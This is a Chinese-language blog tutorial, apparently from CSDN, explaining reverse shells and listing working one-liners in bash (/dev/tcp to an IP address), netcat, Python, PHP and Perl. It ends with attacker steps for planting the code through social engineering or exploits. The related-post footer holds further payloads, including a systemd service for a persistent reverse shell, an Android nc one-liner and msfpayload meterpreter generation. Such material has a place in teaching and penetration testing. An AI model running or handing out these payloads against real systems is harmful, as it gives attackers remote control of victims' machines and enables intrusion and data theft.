Reverse Shell

于 2024-08-07 12:18:26 发布
阅读量543 收藏 14
点赞数 12
文章标签: 网络攻击模型 web安全 经验分享 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67812668/article/details/140988038
版权

一、Reverse Shell原理

1.什么是ReverseShell

反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。

为什么要反弹shell?

通常用于被控端因防火墙受限、权限不足、端口被占用等情形。

举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。那么什么情况下正向连接不能用了呢?

有如下情况:

1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。

2.目标机器的ip动态改变,你不能持续控制。

3.由于防火墙等限制,对方机器只能发送请求,不能接收请求。

4.对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是上策。

那么反弹就很好理解了,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。

2.ReverseShell的实现

通常攻击端作为服务端进行监听,运行指令如下:

# nc  -lnvvp 3333

受害端反弹shell:

[root@victim ~]# bash -i >& /dev/tcp/10.201.61.194/3333 0>&1

反弹shell支持php/perl/java/bash等进行反弹,具体内容如下所示。

二、ReverseShell示例

1.完成正向Shell的场景

  1. 以localhost为例
    1.  nc -lnvvp 3333 –e /bin/sh
  2. 客户端连接
    1.  nc localhost 3333
  3. 客户端随意访问服务端的shell

2.完成基于nc的Reverse Shell场景

  1. 目的:服务端控制客户端shell
  2. 服务端操作:
    1.  nc –lnvvp 3333
  3. 客户端操作:
    1.  nc localhost 3333 –e /bin/sh
    2.  效果: 服务端操作客户端的shell

3.完成基于Bash的Reverse Shell场景

#bash

#bash -i   >&  /dev/tcp/127.0.0.1/3333   0>&1

注意: 一定要先切换到bash,就可以反弹shell

两个窗口:

nc  -lnvvp  3333

nc  -lnvvp  4444

nc  localhost 3333  | /bin/bash  |  nc localhost 4444

4.完成基于Python的 Reverse Shell场景

python -c 'import socket,subprocess,os; \

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

s.connect(("localhost",3333));

os.dup2(s.fileno(),0);

os.dup2(s.fileno(),1);

os.dup2(s.fileno(),2);

p=subprocess.call(["/bin/sh","-i"]);'

5.完成基于PHP的Reverse Shell场景

php -r '$f=fsockopen("127.0.0.1",3333);exec("/bin/sh -i <&3 >&3 2>&3");'

6.完成基于PERL的Reverse Shell场景

perl -e 'use Socket;$i="x.x.x.x";$p=3333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

三、总结

1.Reverse Shell的概念

Reverse shell是一种远程访问技术,其基本原理是让攻击者通过网络连接到受害者电脑的命令行界面或者终端进行操作,而不需要直接访问被攻击者的电脑。攻击者通过将特定的代码注入到受害者电脑中,以建立与其的通信通道,然后与受害者电脑的命令行界面或终端进行交互,达到对其进行控制的目的。Reverse shell通常被黑客用来远程控制被攻击的计算机,执行恶意代码、窃取敏感信息、修改、删除或传输文件、升级权限等行为。

2.Nc实现 Reverse Shell的方法

  1. 攻击者需要先在自己的计算机上开启Nc监听程序,以便等待受害者连接。
  2. 攻击者需要将Reverse shell的代码以一种方式注入到受害者的计算机中。这可以通过各种方式实现,例如使用社交工程学手段欺骗用户点击恶意链接、通过漏洞利用攻击者成功入侵电脑系统等方法。
  3. 一旦受害者电脑上的代码运行成功,将会建立一个反向连接,使得Nc监听程序和受害者的计算机相连接。
  4. 攻击者可以通过与受害者电脑建立的连接,在目标主机上执行各种命令,以达到控制、修改或操控目标设备的目的。

3.Bash实现 Reverse Shell的方法

  1. 攻击者需要在自己的计算机上开启一个监听程序,等待受害者连接。
  2. 攻击者需要准备一个Bash Reverse shell代码。
  3. 攻击者在Bash Reverse shell代码中设置自己计算机的IP地址和端口,并将代码发送给受害者。
  4. 受害者运行Bash Reverse shell代码后,将会建立一条反向连接。连接成功后,攻击者可以向受害者发送命令,对其进行控制、修改或操控目标设备。
卍king卐然
关注
  • 12
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Metasploit reverse Shell的免杀(炊少教学)
weiliang369的博客
02-25 328
rootkithat是我以前的马甲 以前写的文章 我们先生成一个X64的WINDOWS XP 的reverse SHELL 1 2 root@rootkithat:/opt/framework-3.7.1/msf3# ./msfpayload windows/ meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4321 R > /tmp/xp.exe 提示:你可以用 scheduleme -m 1 -u e /tm
reverse shell思路
b10d9的博客
12-03 487
今天在做靶机练习的时候,遇到了在回连shell的时候,使用常用的reverse shell连接失败了。整理了以下思路。通过以下思路判断为何失效,并更新reverse shell内容。(不一定全,欢迎补充) 1. 利用phpinfo()来获取PHP的配置信息。 PHP:<?php phpinfo(); ?> 查看是否具备包含远程文件的条件:allow_url_fopen/allow_url_include是否开启。 查看是否有禁用的函数:disable_functions,重要
Reverse Shell 杂谈
有价值炮灰
12-06 1241
昨天有个小伙伴在群里问在 macOS 下如何实现 bash 反弹 shell,因为 Mac 中没有 `/dev/tcp` 目录。借着这个问题,就来简单谈谈反弹 shell 的那些事。
php reverseShell
Cosmopolitan的博客
06-12 576
<?php $sock = fsockopen($ip, $port); $descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock ); $process = proc_open('/bin/sh', $descriptorspec, $pipes); proc_c...
systemd reverse shell
rainharder的专栏
08-04 119
创建rshell.service文件 [Unit] Description=reverse shell [Service] ExecStart=/usr/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/9999 0>&1' Restart=always RestartSec=60 [Install] WantedBy=default.target 安装 cp rshell.service /lib/systemd/system/ ln -
一行代码实现Android反向shellReverse shell
键盘的起始页
04-12 258
cd /data/data/你的私有目录 && mkfifo f && cat f | /system/bin/sh -i 2>&1 | nc PC_IP 4444 > f。你的私有目录 这个目录可以是你APK的目录,或者你权限读写执行的目录。通过反向shell,即使你无法启用 adb,你也可以拥有一个反向 shell 并通过你的 PC 控制手机。本文通过一行代码即可实现Android反向shellReverse shell)。网上关于android得反向shell 多是需要安装apk的,操作麻烦。
Simple python reverse shell
abg49988的博客
08-22 145
import base64,sys; import socket,struct s=socket.socket(2,socket.SOCK_STREAM) s.connect(('Attack's IP address',ListenerPort)) l=struct.unpack('>I',s.recv(4))[0] d=s.recv(l) while len(d...
reverse php,php-reverse-shell
weixin_28693309的博客
03-27 493
功能:返回一个交互式的shell使用:先修改脚本中的两个变量 $ip 和 $port 为自己所需的。然后本地监听 $port 。例如:$ip = '192.168.1.111'; // CHANGE THIS$port = 13123; // CHANGE THISnc -v -l -p 13123然后上传并在浏览器中打开该PHP脚本文件。效果图: 源代码(在原文的基础进行了修改):set_tim...
Reverse Shell Cheat Sheet
weixin_34406086的博客
11-04 111
2019独角兽企业重金招聘Python工程师标准>>> ...
Reverseshell:一个反向shell应用程序,用于远程运行系统命令
04-04
反壳一个反向程序应用程序,用于运行使用套接字和泡菜远程编写的系统命令。
cpp-python-reverseShell
03-22
标题 "cpp-python-reverseShell" 暗示我们讨论的主题是关于使用C++和Python创建一个反向Shell的技术。在网络安全领域,反向Shell是一种远程控制技术,它允许攻击者从受害者的机器上获取命令行访问权限。在这个项目中...
reverse-shell-generator:简单的脚本来生成反向shell
04-10
cd reverse-shell-generator 3. Install Dependencies: pip3 install -r requirements.txt 4. Run the Python-file: python3 main.py 通过脚本安装: chmod +x install.sh ./install.sh 完毕! 由SoftwareUser23...
reverse-shell-generator:托管的具有大量功能的Reverse Shell生成器。 -(非常适合CTF)
03-03
托管反向Shell生成器,具有大量功能,非常适合CTF 特征 生成公共侦听器和反向外壳 自动复制到剪贴板 用于将侦听端口号增加1的按钮 URI和Base64编码 LocalStorage保留您的配置 暗光模式 截屏 托管实例
php-reverse-shell
07-24
在`php-reverse-shell-master`这个项目中,我们可以找到一个简单的PHP反向Shell示例。它通常包含一个PHP文件,比如`reverse_shell.php`,其中包含了上述提到的连接设置、套接字通信和命令执行等功能。攻击者只需要...
2023护网蓝初面试题汇总
m0_74131821的博客
05-18 1848
日薪1000+的护网行动开始招人了,有想法的速看!
“微软蓝屏”事件暴露了网络安全哪些问题?
2302_80152430的博客
08-03 461
例如,电力系统的故障会波及到依赖电力的通信网络和制造业,而医疗设备的故障则直接影响到患者的健康和生命安全。因此,技术领域需要不断完善系统的韧性,加强风险管理和质量控制机制,确保系统的稳定性和安全性。随着信息技术的普及,公众对网络和服务中断的容忍度越来越低,这就要求各行各业不仅要保障自身系统的稳定运行,还要加强与客户的沟通和透明度。4. 自动化测试与持续集成:使用自动化测试工具,定期运行测试用例,提高测试效率和覆盖率,同时实施持续集成策略,确保每次代码变更都经过自动化的构建和测试。
《密码编码学与网络安全原理与实践》第四章第六章第七章 对称加密体制
m0_57291352的博客
08-06 493
对称加密包括分组密码和流密码分组密码:信息被分块(block)进行加密和解密,连续的明文元素使用相同的密钥K来加密,密文C=c1c2…=EK(m1)EK(m2)…C =c_1c_2…=E_K(m_1)E_K(m_2)…C=c1​c2​…=EK​(m1​)EK​(m2​)…。分组密码可以看作是一个字符长度很大代换——如64比特或更多。大部分的分组对称密码都基于Feistel结构。可逆变换是必要条件。设计”安全”的密码算法不难,只要使用足够多的轮数就可以,但降低速度,因此所有问题就是平衡问题。流密码:流密码中按
【网络安全】探索AI 聊天机器人工作流程实现RCE
最新发布
等风来
08-06 52
我发现了一个广泛使用的AI聊天机器人平台中的远程代码执行漏洞。该漏洞存在于聊天机器人的自定义工作流响应代码中,这些工作流允许开发人员通过创建定制的流程来扩展机器人的功能。
反弹shellbash
07-14
反弹ShellReverse Shell)是一种攻击技术,黑客通过远程控制手段获取到一台主机的权限后,并不会直接登录,而是让目标主机启动一个 shells,这个shell会连接回黑客的计算机上,形成一种“逆转”的通信模式。黑客可以在自己的端口监听这个shell,从而控制目标机器,执行命令、查看文件等操作。 通常,这种技术涉及到以下几个步骤: 1. 攻击者利用漏洞或者社会工程学手段获取了目标系统的访问。 2. 在目标系统上植入恶意代码,比如木马,让它在特定条件下开启一个可以转发连接请求的Shell。 3. 当条件满足时,例如管理员登录或者定期执行,木马会在本地打开一个网络端口,监听来自攻击者的连接。 4. 攻击者远程操控该端口,建立起反向连接,实现对目标系统的控制。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值